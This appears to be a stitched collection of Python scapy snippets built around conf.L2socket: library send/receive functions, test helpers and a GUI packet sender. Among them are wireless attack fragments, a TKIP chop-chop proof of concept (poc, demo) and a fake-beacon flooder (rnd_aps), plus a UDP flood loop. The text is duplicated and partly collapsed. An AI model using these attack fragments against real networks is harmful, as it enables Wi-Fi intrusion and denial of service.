def srp1flood(x,
promisc=None,
filter=None,
iface=None,
nofilter=0,
*args,
**kargs): # noqa: E501
"""Flood and receive packets at layer 2 and return only the first answer
:param prn: function applied to packets received
:param verbose: set verbosity level
:param nofilter: put 1 to avoid use of BPF filters
:param filter: provide a BPF filter
:param iface: listen answers only on the given interface
"""
s = conf.L2socket(promisc=promisc,
filter=filter,
nofilter=nofilter,
iface=iface) # noqa: E501
ans, _ = sndrcvflood(s, x, *args, **kargs)
s.close()
if len(ans) > 0:
return ans[0][1]
else:
return None
def srp(x,
iface=None,
iface_hint=None,
filter=None,
nofilter=0,
type=ETH_P_ALL,
*args,
**kargs):
"""Send and receive packets at layer 2
nofilter: put 1 to avoid use of bpf filters
retry: if positive, how many times to resend unanswered packets
if negative, how many times to retry when no more packets are answered
timeout: how much time to wait after the last packet has been sent
verbose: set verbosity level
multi: whether to accept multiple answers for the same stimulus
filter: provide a BPF filter
iface: work only on the given interface"""
if not kargs.has_key("timeout"):
kargs["timeout"] = -1
if iface is None and iface_hint is not None:
iface = conf.route.route(iface_hint)[0]
s = conf.L2socket(iface=iface, filter=filter, nofilter=nofilter, type=type)
a, b = sndrcv(s, x, *args, **kargs)
s.close()
return a, b
def srpflood(x,
promisc=None,
filter=None,
iface=None,
iface_hint=None,
nofilter=None,
*args,
**kargs): # noqa: E501
"""Flood and receive packets at layer 2
:param prn: function applied to packets received
:param unique: only consider packets whose print
:param nofilter: put 1 to avoid use of BPF filters
:param filter: provide a BPF filter
:param iface: listen answers only on the given interface
"""
if iface is None and iface_hint is not None:
iface = conf.route.route(iface_hint)[0]
s = conf.L2socket(promisc=promisc,
filter=filter,
iface=iface,
nofilter=nofilter) # noqa: E501
r = sndrcvflood(s, x, *args, **kargs)
s.close()
return r
def __init__(self, args):
self.interface = args.i
self.args = args
self.hdr = Headers()
self.injSocket = conf.L2socket(iface=self.interface)
if (args.m != args.i) or args.tun is True:
self.injMac = scapy.arch.get_if_hwaddr(self.interface)
def sendp(x,
inter=0,
loop=0,
iface=None,
iface_hint=None,
count=None,
verbose=None,
realtime=None,
return_packets=False,
socket=None,
*args,
**kargs):
"""Send packets at layer 2
sendp(packets, [inter=0], [loop=0], [iface=None], [iface_hint=None], [count=None], [verbose=conf.verb],
[realtime=None], [return_packets=False], [socket=None]) -> None"""
if iface is None and iface_hint is not None and socket is None:
iface = conf.route.route(iface_hint)[0]
if socket is None:
socket = conf.L2socket(iface=iface, *args, **kargs)
return __gen_send(socket,
x,
inter=inter,
loop=loop,
count=count,
verbose=verbose,
realtime=realtime,
return_packets=return_packets)
def sendp(x,
inter=0,
loop=0,
iface=None,
iface_hint=None,
count=None,
verbose=None,
realtime=None,
return_packets=False,
socket=None,
*args,
**kargs):
"""Send packets at layer 2
sendp(packets, [inter=0], [loop=0], [iface=None], [iface_hint=None], [count=None], [verbose=conf.verb], # noqa: E501
[realtime=None], [return_packets=False], [socket=None]) -> None"""
if iface is None and iface_hint is not None and socket is None:
iface = conf.route.route(iface_hint)[0]
need_closing = socket is None
socket = socket or conf.L2socket(iface=iface, *args, **kargs)
results = __gen_send(socket,
x,
inter=inter,
loop=loop,
count=count,
verbose=verbose,
realtime=realtime,
return_packets=return_packets)
if need_closing:
socket.close()
return results
def _verify_l2socket_setup(cap_filter):
"""Create a socket using the scapy configured l2socket.
Try to create the socket
to see if we have permissions
since AsyncSniffer will do it another
thread so we will not be able to capture
any permission or bind errors.
"""
conf.L2socket(filter=cap_filter)
def srp(x, promisc=None, iface=None, iface_hint=None, filter=None,
nofilter=0, type=ETH_P_ALL, *args, **kargs):
"""Send and receive packets at layer 2"""
if iface is None and iface_hint is not None:
iface = conf.route.route(iface_hint)[0]
s = conf.L2socket(promisc=promisc, iface=iface,
filter=filter, nofilter=nofilter, type=type)
result = sndrcv(s, x, *args, **kargs)
s.close()
return result
def _verify_l2socket_creation_permission():
"""Create a socket using the scapy configured l2socket.
Try to create the socket
to see if we have permissions
since AsyncSniffer will do it another
thread so we will not be able to capture
any permission or bind errors.
"""
# disable scapy promiscuous mode as we do not need it
conf.sniff_promisc = 0
conf.L2socket()
def srpflood(x, promisc=None, filter=None, iface=None, iface_hint=None, nofilter=None, *args,**kargs):
"""Flood and receive packets at layer 2
prn: function applied to packets received. Ret val is printed if not None
store: if 1 (default), store answers and return them
unique: only consider packets whose print
nofilter: put 1 to avoid use of BPF filters
filter: provide a BPF filter
iface: listen answers only on the given interface"""
if iface is None and iface_hint is not None:
iface = conf.route.route(iface_hint)[0]
s = conf.L2socket(promisc=promisc, filter=filter, iface=iface, nofilter=nofilter)
r=sndrcvflood(s,x,*args,**kargs)
s.close()
return r
def send_random_traffic(dst):
dst_mac = None
dst_ip = None
interface = None
#print get_if_list()
src_mac = [get_if_hwaddr(i) for i in get_if_list() if "eth0" in i]
interface = [i for i in get_if_list() if "eth0" in i][0]
if len(src_mac) < 1:
print("No interface for output")
sys.exit(1)
src_mac = src_mac[0]
src_ip = None
if src_mac == "00:00:00:00:01:01":
src_ip = "10.0.1.1"
elif src_mac == "00:00:00:00:02:02":
src_ip = "10.0.2.2"
elif src_mac == "00:00:00:00:03:03":
src_ip = "10.0.3.3"
else:
print("Invalid source host")
sys.exit(1)
if dst in ("h1", "10.0.1.1"):
dst_mac = "00:00:00:00:01:01"
dst_ip = "10.0.1.1"
elif dst in ("h2", "10.0.2.2"):
dst_mac = "00:00:00:00:02:02"
dst_ip = "10.0.2.2"
elif dst in ("h3", "10.0.3.3"):
dst_mac = "00:00:00:00:03:03"
dst_ip = "10.0.3.3"
else:
print("Invalid host to send to")
sys.exit(1)
src_mac = "10:10:10:10:10:10"
data = "ABCDFE"
src_ip = "10.0.10.10"
s = conf.L2socket(iface=interface)
p = Ether(dst=dst_mac, src=src_mac) / IP(frag=5868, dst=dst_ip, src=src_ip)
p = p / UDP(sport=0x00FF, dport=0x00FF) / Raw(load=data)
s.send(p)
def demo(): # Capture a TKIP Frame. print "[+] Capturing a TKIP Frame..." sock = conf.L2socket( type=ETH_P_ALL , iface=IFACE ) l = sniff( lfilter=isTKIP , count=1 , timeout=120 , opened_socket=sock ) if len(l) <= 0: print "[-] Failed to capture a TKIP Frame." exit() packet = l[0].getlayer(Dot11) print "[+]", packet.summary() # Perform the chop-chop attack, and recover the plaintext of an ARP Message. mic , icv = chopchop( sock=sock , packet=packet ) plaintext = decryptARP( mic=mic , icv=icv ) # Show the results. if plaintext is not None: plaintext.show()
def sendp(x,
inter=0,
loop=0,
iface=None,
iface_hint=None,
count=None,
verbose=None,
realtime=None,
return_packets=False,
socket=None,
*args,
**kargs):
"""
Send packets at layer 2
:param x: the packets
:param inter: time (in s) between two packets (default 0)
:param loop: send packet indefinetly (default 0)
:param count: number of packets to send (default None=1)
:param verbose: verbose mode (default None=conf.verbose)
:param realtime: check that a packet was sent before sending the next one
:param return_packets: return the sent packets
:param socket: the socket to use (default is conf.L3socket(kargs))
:param iface: the interface to send the packets on
:param monitor: (not on linux) send in monitor mode
:returns: None
"""
if iface is None and iface_hint is not None and socket is None:
iface = conf.route.route(iface_hint)[0]
need_closing = socket is None
socket = socket or conf.L2socket(iface=iface, *args, **kargs)
results = __gen_send(socket,
x,
inter=inter,
loop=loop,
count=count,
verbose=verbose,
realtime=realtime,
return_packets=return_packets)
if need_closing:
socket.close()
return results
def sendPackets(self):
self.isSending = True
self.shouldStop = False
PktList = self.constructPacketList()
sendNetcard = self.netcardList[self.cmbNetCard.currentIndex()][0]
socket = conf.L2socket(iface=sendNetcard)
sendInvterval = int(
self.edtInter.text()) if self.edtInter.text().isdigit() else 0
sendLoop = int(
self.edtLoop.text()) if self.edtLoop.text().isdigit() else 1
self.SendProgress.setMaximum(sendLoop)
if self.cboxRepeat.checkState():
self.SendProgress.setMaximum(0)
self.SendProgress.setValue(0)
sendLoop = sys.maxsize
now_time = time.time()
old_time = now_time
pktCount = 0
old_pktCount = pktCount
pktRate = 0
time_count = 0
for loopInx in range(sendLoop):
QtWidgets.QApplication.processEvents()
for pkt in PktList:
socket.send(pkt)
pktCount += 1
qtsleep(sendInvterval)
if time_count > 1000:
now_time = time.time()
pktRate = int(
(pktCount - old_pktCount) / (now_time - old_time))
time_count = 0
time_count += sendInvterval
self.lblSendStatus.setText("已发:%d %d/s" % (pktCount, pktRate))
if self.shouldStop:
break
if not self.cboxRepeat.checkState():
self.SendProgress.setValue(loopInx + 1)
if self.shouldStop:
break
self.isSending = False
def rnd_aps(iface):
s = conf.L2socket(iface=iface)
rnd_mac = RandMAC()
itx = 0
try:
while True:
s.send(
RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff",
addr2=rnd_mac,
addr3=rnd_mac,
addr4=rnd_mac) / Dot11Beacon(cap="ESS") /
Dot11Elt(ID="SSID", info=b"VOTA " + LEL_AP[itx]) /
Dot11Elt(ID="Rates", info="\x0c\x12\x18\x24\x30\x48\x60\x6c") /
Dot11Elt(ID="DSset", info=chr(1)))
itx = (itx + 1) % len(LEL_AP)
time.sleep(0.001)
except Exception as e:
print(e)
s.close()
def poc():
# Capture a TKIP Frame.
print "[+] Capturing a TKIP Frame..."
sock = conf.L2socket(type=ETH_P_ALL, iface=IFACE)
l = sniff(lfilter=isTKIP, count=1, timeout=120, opened_socket=sock)
if len(l) <= 0:
print "[-] Failed to capture a TKIP Frame."
exit()
packet = l[0].getlayer(Dot11)
print "[+]", packet.summary()
# Inject a Message with enabled Power Management, followed by a PS-Poll Message.
packet = modifyTKIP(packet)
sock.send(RadioTap() / packet)
sock.send(RadioTap() / getPSPoll())
# Attempt to capture a Null-Data Message.
l = sniff(lfilter=isNullData, count=1, timeout=1, opened_socket=sock)
if len(l) > 0:
print "[+] Received a Null Data Frame."
else:
print "[-] Did not Receive a Null Data Frame."
def srp(x,
promisc=None,
iface=None,
iface_hint=None,
filter=None,
nofilter=0,
type=ETH_P_ALL,
*args,
**kargs): # noqa: E501
"""Send and receive packets at layer 2
nofilter: put 1 to avoid use of BPF filters
retry: if positive, how many times to resend unanswered packets
if negative, how many times to retry when no more packets are answered # noqa: E501
timeout: how much time to wait after the last packet has been sent
verbose: set verbosity level
multi: whether to accept multiple answers for the same stimulus
filter: provide a BPF filter
iface: work only on the given interface
store_unanswered: whether to store not-answered packets or not. Default True.
setting it to False will increase speed, and will return None
as the unans list.
process: if specified, only result from process(pkt) will be stored.
the function should follow the following format:
lambda sent, received: (func(sent), func2(received))
if the packet is unanswered, `received` will be None.
if `store_unanswered` is False, the function won't be called on un-answered packets.""" # noqa: E501
if iface is None and iface_hint is not None:
iface = conf.route.route(iface_hint)[0]
s = conf.L2socket(promisc=promisc,
iface=iface,
filter=filter,
nofilter=nofilter,
type=type) # noqa: E501
result = sndrcv(s, x, *args, **kargs)
s.close()
return result
def start(self):
self.s = conf.L2socket(iface=self.iface)
# limitations under the License
from scapy.all import Ether, IP, sendp, get_if_hwaddr, get_if_list, TCP, Raw, UDP
from scapy.config import conf
import sys
from time import sleep, time
from multiprocessing import Process
src_mac = "00:00:00:00:01:01"
data = "ABCDFE"
src_ip = "10.0.1.1"
dst_mac = "00:00:00:00:02:02"
dst_ip = "10.0.2.2"
interface = [i for i in get_if_list() if "eth0" in i][0]
s = conf.L2socket(iface=interface)
p = Ether(dst=dst_mac, src=src_mac) / IP(frag=0, dst=dst_ip, src=src_ip)
p = p / UDP(sport=0x11FF, dport=0x22FF) / Raw(load=data)
def send(id):
pkt_cnt = 0
last_sec = time()
while True:
s.send(p)
pkt_cnt += 1
if time() - last_sec > 1.0:
print("[%d]Pkt/s: %d" % (id, pkt_cnt))
pkt_cnt = 0
last_sec = time()
def __init__(self, interface_name):
PacketVerifier.__init__(self, interface_name)
self._sock = conf.L2socket(iface=interface_name, type=ETH_P_ALL)
def start(self):
# type: () -> None
self.s = conf.L2socket(iface=self.iface)
